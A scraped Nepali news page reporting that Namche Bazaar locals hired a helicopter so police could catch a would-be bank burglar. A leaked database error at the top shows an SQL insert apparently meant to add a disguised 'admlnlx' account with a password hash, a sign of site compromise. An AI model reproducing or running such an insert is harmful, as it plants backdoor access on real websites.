WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B28hRxE2kRj1SAScANCYjztMo4VC14/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:29:24', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु, पुस १३–
नाम्चे बजारका व्यवसायीहरूले चोर पक्राउ गर्न लाखौं खर्च गरेर हेलिकोप्टर चार्टर गरेका छन् । नाम्चे बजारमा चोरी गरेर करिब आठ घन्टाको बाटोमा पर्ने दोले पुगेका चोरलाई पक्रन स्थानीयवासीले हेलिकोप्टर भाडामा लिएर प्रहरीलाई चोर लुकेको स्थानमा पुर्याएका हुन् । आजको राजधानी दैनिकमा खबर छ ।
‘चोरी गरेका व्यक्ति पहिचान भएपछि हामीले चोर पक्रन प्रहरीलाई हेलिकोप्टरमा राखेर लग्यौं अन्ततः उनीहरू पक्राउ परे,’ नाम्चेका स्थानीय लामाकाजी शेर्पाले भने ।
शेर्पाका अनुसार चोरीको घटना भने गत शुक्रबार रातिको हो । चोरले राष्ट्रिय वाणिज्य बैंक शाखा कार्यालय नाम्चेमा चोरीको प्रयास गर्यो । ढोका फुटाएर भित्र पसिसकेपछि सुरक्षा गार्डले थाहा पाए । तत्कालै चोर भाग्यो। रातको समयमा बेपत्ता चोर त्यसबेला पत्ता लाग्यो, जब बैंक कर्मचारीले स्थानीयलाई सीसी क्यामेर फुटेज देखाए । चोरीको असफल प्रयास गर्ने सोलुखुम्बु तिङलाका सूर्य मगर रहेछन् । मगरको पहिचान भएपछि उनी कहाँ बस्छन् भन्ने खोजी सुरु भयो । उनी खुम्जुङको दोलेस्थित एक होटलमा काम गर्ने भन्ने जानकारी प्राप्त भयो ।
स्थानीयले आफन्तमार्फत गोप्य रूपमा सोधखोज थाले । चोरीको असफल प्रयासपछि प्रहरीबाट भाग्दै मगर शनिबार होटलमा पुगेको जानकारी प्राप्त भयो। ‘प्रहरी तत्काल त्यहाँ नपुगेमा अभियुक्त भाग्न सक्ने सम्भावना थियो हिँडेर पुग्न एक दिन लाग्ने भएकाले स्थानीयले होलिकोप्टर लिएर जान प्रस्ताव गरे,’ इलाका प्रहरी कार्यालय नाम्चेका प्रमुख तेजनारायण यादवले भने, ‘सो स्थानमा २० मिनेटमा नै पुग्न सफल मात्र भएनौं अभियुक्तलाई पक्राउ गर्नसमेत सफल भयौं ।’
मगरलाई पक्राउ गरी प्रहरी टोली र स्थानीय भने हिँडेरै आइतबार नाम्चे फर्कियो । हेलिकोप्टर भने एक विदेशी नागरिक लिन होर्सेतिर लाग्यो । ‘अभियुक्तलाई पैदल मार्गबाट अस्ति (आइतबार) साँझ इलाका प्रहरी कार्यालय नाम्चेमा ल्याएका छौं,’ निरीक्षक यादवले भने । निरीक्षक यादव प्रहरीको काममा नाम्चेवासीले गरेको सहयोगबाट थप उत्साहित भएको बताउँछन् ।